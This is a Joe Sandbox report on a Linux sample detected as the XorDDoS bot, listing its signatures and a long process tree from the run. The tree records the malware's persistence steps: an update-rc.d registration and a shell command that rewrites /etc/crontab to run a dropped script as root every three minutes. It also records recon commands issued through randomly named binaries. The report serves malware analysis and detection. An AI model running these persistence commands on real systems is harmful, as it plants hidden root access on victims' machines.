Edit tour

Linux Analysis Report
HaJTqGiPpD

Overview

General Information

Sample name:	HaJTqGiPpD renamed because original name is a hash value
Original sample name:	3bb61c0ad19495ae554363823eb83657b403c3aacdf9cddb9b111c2c4321a6da
Analysis ID:	1495718
MD5:	a14578469fab44514dfca6c4eead755d
SHA1:	cf09ec13381b559a9d0e2ced5d8d710c8ba2affa
SHA256:	3bb61c0ad19495ae554363823eb83657b403c3aacdf9cddb9b111c2c4321a6da
Infos:

Detection

XorDDoS

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected XorDDoS Bot

Drops files in suspicious directories

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample deletes itself

Sample tries to persist itself using System V runlevels

Sample tries to persist itself using cron

Drops files with innocent-looking names

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

PID-file does not contain an ASCII number

Reads system information from the proc file system

Sample and/or dropped files contains symbols with suspicious names

Sleeps for long times indicative of sandbox evasion

Uses SMTP (mail sending)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1495718
Start date and time:	2024-08-20 15:32:32 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	HaJTqGiPpD renamed because original name is a hash value
Original Sample Name:	3bb61c0ad19495ae554363823eb83657b403c3aacdf9cddb9b111c2c4321a6da
Detection:	MAL
Classification:	mal100.troj.evad.lin@0/19@126/0

Runtime Messages

Command:	/tmp/HaJTqGiPpD
PID:	6229
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6202, Parent: 4331)

rm (PID: 6202, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bf7OUfIiir /tmp/tmp.YpFzGJMNgu /tmp/tmp.lS9NOxlH0t

dash New Fork (PID: 6203, Parent: 4331)

rm (PID: 6203, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bf7OUfIiir /tmp/tmp.YpFzGJMNgu /tmp/tmp.lS9NOxlH0t

HaJTqGiPpD (PID: 6229, Parent: 6127, MD5: a14578469fab44514dfca6c4eead755d) Arguments: /tmp/HaJTqGiPpD

HaJTqGiPpD New Fork (PID: 6230, Parent: 6229)

HaJTqGiPpD New Fork (PID: 6231, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6232, Parent: 6231)

HaJTqGiPpD New Fork (PID: 6233, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6234, Parent: 6233)

update-rc.d (PID: 6234, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d HaJTqGiPpD defaults

update-rc.d New Fork (PID: 6240, Parent: 6234)

systemctl (PID: 6240, Parent: 6234, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

HaJTqGiPpD New Fork (PID: 6235, Parent: 6230)

sh (PID: 6235, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

sh New Fork (PID: 6236, Parent: 6235)

sed (PID: 6236, Parent: 6235, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab

HaJTqGiPpD New Fork (PID: 6263, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6264, Parent: 6263)

kigdktzeum (PID: 6264, Parent: 6263, MD5: 487aaa06ee19b8dfaa6a6b2eef2535e4) Arguments: /usr/bin/kigdktzeum who 6230

kigdktzeum New Fork (PID: 6265, Parent: 6264)

HaJTqGiPpD New Fork (PID: 6266, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6267, Parent: 6266)

kigdktzeum (PID: 6267, Parent: 6266, MD5: 487aaa06ee19b8dfaa6a6b2eef2535e4) Arguments: /usr/bin/kigdktzeum sh 6230

kigdktzeum New Fork (PID: 6268, Parent: 6267)

HaJTqGiPpD New Fork (PID: 6269, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6270, Parent: 6269)

kigdktzeum (PID: 6270, Parent: 6269, MD5: 487aaa06ee19b8dfaa6a6b2eef2535e4) Arguments: /usr/bin/kigdktzeum "ls -la" 6230

kigdktzeum New Fork (PID: 6271, Parent: 6270)

HaJTqGiPpD New Fork (PID: 6272, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6273, Parent: 6272)

kigdktzeum (PID: 6273, Parent: 6272, MD5: 487aaa06ee19b8dfaa6a6b2eef2535e4) Arguments: /usr/bin/kigdktzeum uptime 6230

kigdktzeum New Fork (PID: 6276, Parent: 6273)

HaJTqGiPpD New Fork (PID: 6274, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6275, Parent: 6274)

kigdktzeum (PID: 6275, Parent: 6274, MD5: 487aaa06ee19b8dfaa6a6b2eef2535e4) Arguments: /usr/bin/kigdktzeum id 6230

kigdktzeum New Fork (PID: 6277, Parent: 6275)

HaJTqGiPpD New Fork (PID: 6280, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6281, Parent: 6280)

mizdkrdyqj (PID: 6281, Parent: 6280, MD5: e0198a1a12f1f0963ee32aeae9384d8b) Arguments: /usr/bin/mizdkrdyqj "ps -ef" 6230

mizdkrdyqj New Fork (PID: 6282, Parent: 6281)

HaJTqGiPpD New Fork (PID: 6283, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6284, Parent: 6283)

mizdkrdyqj (PID: 6284, Parent: 6283, MD5: e0198a1a12f1f0963ee32aeae9384d8b) Arguments: /usr/bin/mizdkrdyqj "ls -la" 6230

mizdkrdyqj New Fork (PID: 6287, Parent: 6284)

HaJTqGiPpD New Fork (PID: 6285, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6286, Parent: 6285)

mizdkrdyqj (PID: 6286, Parent: 6285, MD5: e0198a1a12f1f0963ee32aeae9384d8b) Arguments: /usr/bin/mizdkrdyqj "grep \"A\"" 6230

mizdkrdyqj New Fork (PID: 6290, Parent: 6286)

HaJTqGiPpD New Fork (PID: 6288, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6289, Parent: 6288)

mizdkrdyqj (PID: 6289, Parent: 6288, MD5: e0198a1a12f1f0963ee32aeae9384d8b) Arguments: /usr/bin/mizdkrdyqj sh 6230

mizdkrdyqj New Fork (PID: 6293, Parent: 6289)

HaJTqGiPpD New Fork (PID: 6291, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6292, Parent: 6291)

mizdkrdyqj (PID: 6292, Parent: 6291, MD5: e0198a1a12f1f0963ee32aeae9384d8b) Arguments: /usr/bin/mizdkrdyqj "sleep 1" 6230

mizdkrdyqj New Fork (PID: 6294, Parent: 6292)

HaJTqGiPpD New Fork (PID: 6298, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6299, Parent: 6298)

becqudbgme (PID: 6299, Parent: 6298, MD5: cb780d7ae3ef97f4221a67b15940a84d) Arguments: /usr/bin/becqudbgme su 6230

becqudbgme New Fork (PID: 6301, Parent: 6299)

HaJTqGiPpD New Fork (PID: 6300, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6302, Parent: 6300)

becqudbgme (PID: 6302, Parent: 6300, MD5: cb780d7ae3ef97f4221a67b15940a84d) Arguments: /usr/bin/becqudbgme ls 6230

becqudbgme New Fork (PID: 6304, Parent: 6302)

HaJTqGiPpD New Fork (PID: 6303, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6305, Parent: 6303)

becqudbgme (PID: 6305, Parent: 6303, MD5: cb780d7ae3ef97f4221a67b15940a84d) Arguments: /usr/bin/becqudbgme su 6230

becqudbgme New Fork (PID: 6308, Parent: 6305)

HaJTqGiPpD New Fork (PID: 6306, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6307, Parent: 6306)

becqudbgme (PID: 6307, Parent: 6306, MD5: cb780d7ae3ef97f4221a67b15940a84d) Arguments: /usr/bin/becqudbgme bash 6230

becqudbgme New Fork (PID: 6309, Parent: 6307)

HaJTqGiPpD New Fork (PID: 6310, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6311, Parent: 6310)

becqudbgme (PID: 6311, Parent: 6310, MD5: cb780d7ae3ef97f4221a67b15940a84d) Arguments: /usr/bin/becqudbgme sh 6230

becqudbgme New Fork (PID: 6312, Parent: 6311)

HaJTqGiPpD New Fork (PID: 6328, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6329, Parent: 6328)

sxruomujjd (PID: 6329, Parent: 6328, MD5: cba8307e43bff3556880dcd526a511a5) Arguments: /usr/bin/sxruomujjd "ps -ef" 6230

sxruomujjd New Fork (PID: 6330, Parent: 6329)

HaJTqGiPpD New Fork (PID: 6331, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6332, Parent: 6331)

sxruomujjd (PID: 6332, Parent: 6331, MD5: cba8307e43bff3556880dcd526a511a5) Arguments: /usr/bin/sxruomujjd "netstat -antop" 6230

sxruomujjd New Fork (PID: 6335, Parent: 6332)

HaJTqGiPpD New Fork (PID: 6333, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6334, Parent: 6333)

sxruomujjd (PID: 6334, Parent: 6333, MD5: cba8307e43bff3556880dcd526a511a5) Arguments: /usr/bin/sxruomujjd top 6230

sxruomujjd New Fork (PID: 6340, Parent: 6334)

HaJTqGiPpD New Fork (PID: 6336, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6337, Parent: 6336)

sxruomujjd (PID: 6337, Parent: 6336, MD5: cba8307e43bff3556880dcd526a511a5) Arguments: /usr/bin/sxruomujjd "ps -ef" 6230

sxruomujjd New Fork (PID: 6341, Parent: 6337)

HaJTqGiPpD New Fork (PID: 6338, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6339, Parent: 6338)

sxruomujjd (PID: 6339, Parent: 6338, MD5: cba8307e43bff3556880dcd526a511a5) Arguments: /usr/bin/sxruomujjd "cat resolv.conf" 6230

sxruomujjd New Fork (PID: 6342, Parent: 6339)

HaJTqGiPpD New Fork (PID: 6345, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6346, Parent: 6345)

qrabekbstr (PID: 6346, Parent: 6345, MD5: 1975c0ca7e1b7192bccb225af16f47b5) Arguments: /usr/bin/qrabekbstr bash 6230

qrabekbstr New Fork (PID: 6347, Parent: 6346)

HaJTqGiPpD New Fork (PID: 6348, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6349, Parent: 6348)

qrabekbstr (PID: 6349, Parent: 6348, MD5: 1975c0ca7e1b7192bccb225af16f47b5) Arguments: /usr/bin/qrabekbstr sh 6230

qrabekbstr New Fork (PID: 6350, Parent: 6349)

HaJTqGiPpD New Fork (PID: 6351, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6352, Parent: 6351)

qrabekbstr (PID: 6352, Parent: 6351, MD5: 1975c0ca7e1b7192bccb225af16f47b5) Arguments: /usr/bin/qrabekbstr pwd 6230

qrabekbstr New Fork (PID: 6355, Parent: 6352)

HaJTqGiPpD New Fork (PID: 6353, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6354, Parent: 6353)

qrabekbstr (PID: 6354, Parent: 6353, MD5: 1975c0ca7e1b7192bccb225af16f47b5) Arguments: /usr/bin/qrabekbstr top 6230

qrabekbstr New Fork (PID: 6358, Parent: 6354)

HaJTqGiPpD New Fork (PID: 6356, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6357, Parent: 6356)

qrabekbstr (PID: 6357, Parent: 6356, MD5: 1975c0ca7e1b7192bccb225af16f47b5) Arguments: /usr/bin/qrabekbstr "netstat -antop" 6230

qrabekbstr New Fork (PID: 6359, Parent: 6357)

HaJTqGiPpD New Fork (PID: 6364, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6365, Parent: 6364)

sotpizdssr (PID: 6365, Parent: 6364, MD5: 60d7d2347ab3a1dd326249ca54ebfd91) Arguments: /usr/bin/sotpizdssr top 6230

sotpizdssr New Fork (PID: 6366, Parent: 6365)

HaJTqGiPpD New Fork (PID: 6367, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6368, Parent: 6367)

sotpizdssr (PID: 6368, Parent: 6367, MD5: 60d7d2347ab3a1dd326249ca54ebfd91) Arguments: /usr/bin/sotpizdssr "route -n" 6230

sotpizdssr New Fork (PID: 6369, Parent: 6368)

HaJTqGiPpD New Fork (PID: 6370, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6371, Parent: 6370)

sotpizdssr (PID: 6371, Parent: 6370, MD5: 60d7d2347ab3a1dd326249ca54ebfd91) Arguments: /usr/bin/sotpizdssr "sleep 1" 6230

sotpizdssr New Fork (PID: 6374, Parent: 6371)

HaJTqGiPpD New Fork (PID: 6372, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6373, Parent: 6372)

sotpizdssr (PID: 6373, Parent: 6372, MD5: 60d7d2347ab3a1dd326249ca54ebfd91) Arguments: /usr/bin/sotpizdssr "ifconfig eth0" 6230

sotpizdssr New Fork (PID: 6377, Parent: 6373)

HaJTqGiPpD New Fork (PID: 6375, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6376, Parent: 6375)

sotpizdssr (PID: 6376, Parent: 6375, MD5: 60d7d2347ab3a1dd326249ca54ebfd91) Arguments: /usr/bin/sotpizdssr who 6230

sotpizdssr New Fork (PID: 6378, Parent: 6376)

HaJTqGiPpD New Fork (PID: 6381, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6382, Parent: 6381)

gnmftoxpza (PID: 6382, Parent: 6381, MD5: e0c968701ddbbebdd70eb5c8f3abeeb5) Arguments: /usr/bin/gnmftoxpza sh 6230

gnmftoxpza New Fork (PID: 6383, Parent: 6382)

HaJTqGiPpD New Fork (PID: 6384, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6385, Parent: 6384)

gnmftoxpza (PID: 6385, Parent: 6384, MD5: e0c968701ddbbebdd70eb5c8f3abeeb5) Arguments: /usr/bin/gnmftoxpza "route -n" 6230

gnmftoxpza New Fork (PID: 6386, Parent: 6385)

HaJTqGiPpD New Fork (PID: 6387, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6388, Parent: 6387)

gnmftoxpza (PID: 6388, Parent: 6387, MD5: e0c968701ddbbebdd70eb5c8f3abeeb5) Arguments: /usr/bin/gnmftoxpza top 6230

gnmftoxpza New Fork (PID: 6391, Parent: 6388)

HaJTqGiPpD New Fork (PID: 6389, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6390, Parent: 6389)

gnmftoxpza (PID: 6390, Parent: 6389, MD5: e0c968701ddbbebdd70eb5c8f3abeeb5) Arguments: /usr/bin/gnmftoxpza gnome-terminal 6230

gnmftoxpza New Fork (PID: 6394, Parent: 6390)

HaJTqGiPpD New Fork (PID: 6392, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6393, Parent: 6392)

gnmftoxpza (PID: 6393, Parent: 6392, MD5: e0c968701ddbbebdd70eb5c8f3abeeb5) Arguments: /usr/bin/gnmftoxpza su 6230

gnmftoxpza New Fork (PID: 6395, Parent: 6393)

HaJTqGiPpD New Fork (PID: 6398, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6399, Parent: 6398)

iulapzbfpq (PID: 6399, Parent: 6398, MD5: 7800f11c348419e086e37dfb8e609c16) Arguments: /usr/bin/iulapzbfpq "grep \"A\"" 6230

iulapzbfpq New Fork (PID: 6400, Parent: 6399)

HaJTqGiPpD New Fork (PID: 6401, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6402, Parent: 6401)

iulapzbfpq (PID: 6402, Parent: 6401, MD5: 7800f11c348419e086e37dfb8e609c16) Arguments: /usr/bin/iulapzbfpq ifconfig 6230

iulapzbfpq New Fork (PID: 6403, Parent: 6402)

HaJTqGiPpD New Fork (PID: 6404, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6405, Parent: 6404)

iulapzbfpq (PID: 6405, Parent: 6404, MD5: 7800f11c348419e086e37dfb8e609c16) Arguments: /usr/bin/iulapzbfpq who 6230

iulapzbfpq New Fork (PID: 6408, Parent: 6405)

HaJTqGiPpD New Fork (PID: 6406, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6407, Parent: 6406)

iulapzbfpq (PID: 6407, Parent: 6406, MD5: 7800f11c348419e086e37dfb8e609c16) Arguments: /usr/bin/iulapzbfpq gnome-terminal 6230

iulapzbfpq New Fork (PID: 6410, Parent: 6407)

HaJTqGiPpD New Fork (PID: 6409, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6411, Parent: 6409)

iulapzbfpq (PID: 6411, Parent: 6409, MD5: 7800f11c348419e086e37dfb8e609c16) Arguments: /usr/bin/iulapzbfpq "netstat -antop" 6230

iulapzbfpq New Fork (PID: 6412, Parent: 6411)

HaJTqGiPpD New Fork (PID: 6418, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6419, Parent: 6418)

posifzmmhg (PID: 6419, Parent: 6418, MD5: 1537102237a8f774a8ec3660ded7ea96) Arguments: /usr/bin/posifzmmhg "netstat -an" 6230

posifzmmhg New Fork (PID: 6420, Parent: 6419)

HaJTqGiPpD New Fork (PID: 6421, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6422, Parent: 6421)

posifzmmhg (PID: 6422, Parent: 6421, MD5: 1537102237a8f774a8ec3660ded7ea96) Arguments: /usr/bin/posifzmmhg "ifconfig eth0" 6230

posifzmmhg New Fork (PID: 6425, Parent: 6422)

HaJTqGiPpD New Fork (PID: 6423, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6424, Parent: 6423)

posifzmmhg (PID: 6424, Parent: 6423, MD5: 1537102237a8f774a8ec3660ded7ea96) Arguments: /usr/bin/posifzmmhg pwd 6230

posifzmmhg New Fork (PID: 6428, Parent: 6424)

HaJTqGiPpD New Fork (PID: 6426, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6427, Parent: 6426)

posifzmmhg (PID: 6427, Parent: 6426, MD5: 1537102237a8f774a8ec3660ded7ea96) Arguments: /usr/bin/posifzmmhg "netstat -antop" 6230

posifzmmhg New Fork (PID: 6431, Parent: 6427)

HaJTqGiPpD New Fork (PID: 6429, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6430, Parent: 6429)

posifzmmhg (PID: 6430, Parent: 6429, MD5: 1537102237a8f774a8ec3660ded7ea96) Arguments: /usr/bin/posifzmmhg top 6230

posifzmmhg New Fork (PID: 6432, Parent: 6430)

HaJTqGiPpD New Fork (PID: 6435, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6436, Parent: 6435)

buxftyvhwp (PID: 6436, Parent: 6435, MD5: 7b2961599910e9c0848d93f2a9e7562f) Arguments: /usr/bin/buxftyvhwp "netstat -an" 6230

buxftyvhwp New Fork (PID: 6437, Parent: 6436)

HaJTqGiPpD New Fork (PID: 6438, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6439, Parent: 6438)

buxftyvhwp (PID: 6439, Parent: 6438, MD5: 7b2961599910e9c0848d93f2a9e7562f) Arguments: /usr/bin/buxftyvhwp "netstat -an" 6230

buxftyvhwp New Fork (PID: 6442, Parent: 6439)

HaJTqGiPpD New Fork (PID: 6440, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6441, Parent: 6440)

buxftyvhwp (PID: 6441, Parent: 6440, MD5: 7b2961599910e9c0848d93f2a9e7562f) Arguments: /usr/bin/buxftyvhwp pwd 6230

buxftyvhwp New Fork (PID: 6447, Parent: 6441)

HaJTqGiPpD New Fork (PID: 6443, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6444, Parent: 6443)

buxftyvhwp (PID: 6444, Parent: 6443, MD5: 7b2961599910e9c0848d93f2a9e7562f) Arguments: /usr/bin/buxftyvhwp pwd 6230

buxftyvhwp New Fork (PID: 6448, Parent: 6444)

HaJTqGiPpD New Fork (PID: 6445, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6446, Parent: 6445)

buxftyvhwp (PID: 6446, Parent: 6445, MD5: 7b2961599910e9c0848d93f2a9e7562f) Arguments: /usr/bin/buxftyvhwp "netstat -antop" 6230

buxftyvhwp New Fork (PID: 6449, Parent: 6446)

HaJTqGiPpD New Fork (PID: 6452, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6453, Parent: 6452)

wvbxepjyjx (PID: 6453, Parent: 6452, MD5: 8c8e618efd671f62350f8ff8336cb8bc) Arguments: /usr/bin/wvbxepjyjx "netstat -an" 6230

wvbxepjyjx New Fork (PID: 6456, Parent: 6453)

HaJTqGiPpD New Fork (PID: 6454, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6455, Parent: 6454)

wvbxepjyjx (PID: 6455, Parent: 6454, MD5: 8c8e618efd671f62350f8ff8336cb8bc) Arguments: /usr/bin/wvbxepjyjx gnome-terminal 6230

wvbxepjyjx New Fork (PID: 6458, Parent: 6455)

HaJTqGiPpD New Fork (PID: 6457, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6459, Parent: 6457)

wvbxepjyjx (PID: 6459, Parent: 6457, MD5: 8c8e618efd671f62350f8ff8336cb8bc) Arguments: /usr/bin/wvbxepjyjx bash 6230

wvbxepjyjx New Fork (PID: 6460, Parent: 6459)

HaJTqGiPpD New Fork (PID: 6461, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6462, Parent: 6461)

wvbxepjyjx (PID: 6462, Parent: 6461, MD5: 8c8e618efd671f62350f8ff8336cb8bc) Arguments: /usr/bin/wvbxepjyjx "netstat -antop" 6230

wvbxepjyjx New Fork (PID: 6465, Parent: 6462)

HaJTqGiPpD New Fork (PID: 6463, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6464, Parent: 6463)

wvbxepjyjx (PID: 6464, Parent: 6463, MD5: 8c8e618efd671f62350f8ff8336cb8bc) Arguments: /usr/bin/wvbxepjyjx top 6230

wvbxepjyjx New Fork (PID: 6466, Parent: 6464)

HaJTqGiPpD New Fork (PID: 6469, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6470, Parent: 6469)

eqznayducj (PID: 6470, Parent: 6469, MD5: 9a54fa11d5b90703482052dcd884c96b) Arguments: /usr/bin/eqznayducj "cd /etc" 6230

eqznayducj New Fork (PID: 6471, Parent: 6470)

HaJTqGiPpD New Fork (PID: 6472, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6473, Parent: 6472)

eqznayducj (PID: 6473, Parent: 6472, MD5: 9a54fa11d5b90703482052dcd884c96b) Arguments: /usr/bin/eqznayducj sh 6230

eqznayducj New Fork (PID: 6476, Parent: 6473)

HaJTqGiPpD New Fork (PID: 6474, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6475, Parent: 6474)

eqznayducj (PID: 6475, Parent: 6474, MD5: 9a54fa11d5b90703482052dcd884c96b) Arguments: /usr/bin/eqznayducj ifconfig 6230

eqznayducj New Fork (PID: 6478, Parent: 6475)

HaJTqGiPpD New Fork (PID: 6477, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6479, Parent: 6477)

eqznayducj (PID: 6479, Parent: 6477, MD5: 9a54fa11d5b90703482052dcd884c96b) Arguments: /usr/bin/eqznayducj top 6230

eqznayducj New Fork (PID: 6481, Parent: 6479)

HaJTqGiPpD New Fork (PID: 6480, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6482, Parent: 6480)

eqznayducj (PID: 6482, Parent: 6480, MD5: 9a54fa11d5b90703482052dcd884c96b) Arguments: /usr/bin/eqznayducj "ifconfig eth0" 6230

eqznayducj New Fork (PID: 6483, Parent: 6482)

HaJTqGiPpD New Fork (PID: 6486, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6487, Parent: 6486)

ibkljkndlm (PID: 6487, Parent: 6486, MD5: f509e839e4e038de164ecdecb9aa9404) Arguments: /usr/bin/ibkljkndlm su 6230

ibkljkndlm New Fork (PID: 6488, Parent: 6487)

HaJTqGiPpD New Fork (PID: 6491, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6492, Parent: 6491)

ibkljkndlm (PID: 6492, Parent: 6491, MD5: f509e839e4e038de164ecdecb9aa9404) Arguments: /usr/bin/ibkljkndlm ls 6230

ibkljkndlm New Fork (PID: 6494, Parent: 6492)

HaJTqGiPpD New Fork (PID: 6493, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6495, Parent: 6493)

ibkljkndlm (PID: 6495, Parent: 6493, MD5: f509e839e4e038de164ecdecb9aa9404) Arguments: /usr/bin/ibkljkndlm "netstat -antop" 6230

ibkljkndlm New Fork (PID: 6498, Parent: 6495)

HaJTqGiPpD New Fork (PID: 6496, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6497, Parent: 6496)

ibkljkndlm (PID: 6497, Parent: 6496, MD5: f509e839e4e038de164ecdecb9aa9404) Arguments: /usr/bin/ibkljkndlm "ps -ef" 6230

ibkljkndlm New Fork (PID: 6501, Parent: 6497)

HaJTqGiPpD New Fork (PID: 6499, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6500, Parent: 6499)

ibkljkndlm (PID: 6500, Parent: 6499, MD5: f509e839e4e038de164ecdecb9aa9404) Arguments: /usr/bin/ibkljkndlm "cd /etc" 6230

ibkljkndlm New Fork (PID: 6502, Parent: 6500)

HaJTqGiPpD New Fork (PID: 6506, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6507, Parent: 6506)

oarnkspbbo (PID: 6507, Parent: 6506, MD5: 3d96ab25c872e7fc62945f69932798cd) Arguments: /usr/bin/oarnkspbbo who 6230

oarnkspbbo New Fork (PID: 6508, Parent: 6507)

HaJTqGiPpD New Fork (PID: 6509, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6510, Parent: 6509)

oarnkspbbo (PID: 6510, Parent: 6509, MD5: 3d96ab25c872e7fc62945f69932798cd) Arguments: /usr/bin/oarnkspbbo "sleep 1" 6230

oarnkspbbo New Fork (PID: 6511, Parent: 6510)

HaJTqGiPpD New Fork (PID: 6512, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6513, Parent: 6512)

oarnkspbbo (PID: 6513, Parent: 6512, MD5: 3d96ab25c872e7fc62945f69932798cd) Arguments: /usr/bin/oarnkspbbo "sleep 1" 6230

oarnkspbbo New Fork (PID: 6515, Parent: 6513)

HaJTqGiPpD New Fork (PID: 6514, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6516, Parent: 6514)

oarnkspbbo (PID: 6516, Parent: 6514, MD5: 3d96ab25c872e7fc62945f69932798cd) Arguments: /usr/bin/oarnkspbbo "cat resolv.conf" 6230

oarnkspbbo New Fork (PID: 6519, Parent: 6516)

HaJTqGiPpD New Fork (PID: 6517, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6518, Parent: 6517)

oarnkspbbo (PID: 6518, Parent: 6517, MD5: 3d96ab25c872e7fc62945f69932798cd) Arguments: /usr/bin/oarnkspbbo su 6230

oarnkspbbo New Fork (PID: 6520, Parent: 6518)

HaJTqGiPpD New Fork (PID: 6523, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6524, Parent: 6523)

ungjrprpkb (PID: 6524, Parent: 6523, MD5: 3f65b405d072a72c577de91340204441) Arguments: /usr/bin/ungjrprpkb "netstat -antop" 6230

ungjrprpkb New Fork (PID: 6525, Parent: 6524)

HaJTqGiPpD New Fork (PID: 6526, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6527, Parent: 6526)

ungjrprpkb (PID: 6527, Parent: 6526, MD5: 3f65b405d072a72c577de91340204441) Arguments: /usr/bin/ungjrprpkb "cd /etc" 6230

ungjrprpkb New Fork (PID: 6528, Parent: 6527)

HaJTqGiPpD New Fork (PID: 6529, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6530, Parent: 6529)

ungjrprpkb (PID: 6530, Parent: 6529, MD5: 3f65b405d072a72c577de91340204441) Arguments: /usr/bin/ungjrprpkb "ls -la" 6230

ungjrprpkb New Fork (PID: 6531, Parent: 6530)

HaJTqGiPpD New Fork (PID: 6532, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6533, Parent: 6532)

ungjrprpkb (PID: 6533, Parent: 6532, MD5: 3f65b405d072a72c577de91340204441) Arguments: /usr/bin/ungjrprpkb uptime 6230

ungjrprpkb New Fork (PID: 6536, Parent: 6533)

HaJTqGiPpD New Fork (PID: 6534, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6535, Parent: 6534)

ungjrprpkb (PID: 6535, Parent: 6534, MD5: 3f65b405d072a72c577de91340204441) Arguments: /usr/bin/ungjrprpkb "route -n" 6230

ungjrprpkb New Fork (PID: 6537, Parent: 6535)

HaJTqGiPpD New Fork (PID: 6540, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6541, Parent: 6540)

gdmrzwxnqy (PID: 6541, Parent: 6540, MD5: 7ece6ba9fe32b7d91c5dcf497de20033) Arguments: /usr/bin/gdmrzwxnqy su 6230

gdmrzwxnqy New Fork (PID: 6542, Parent: 6541)

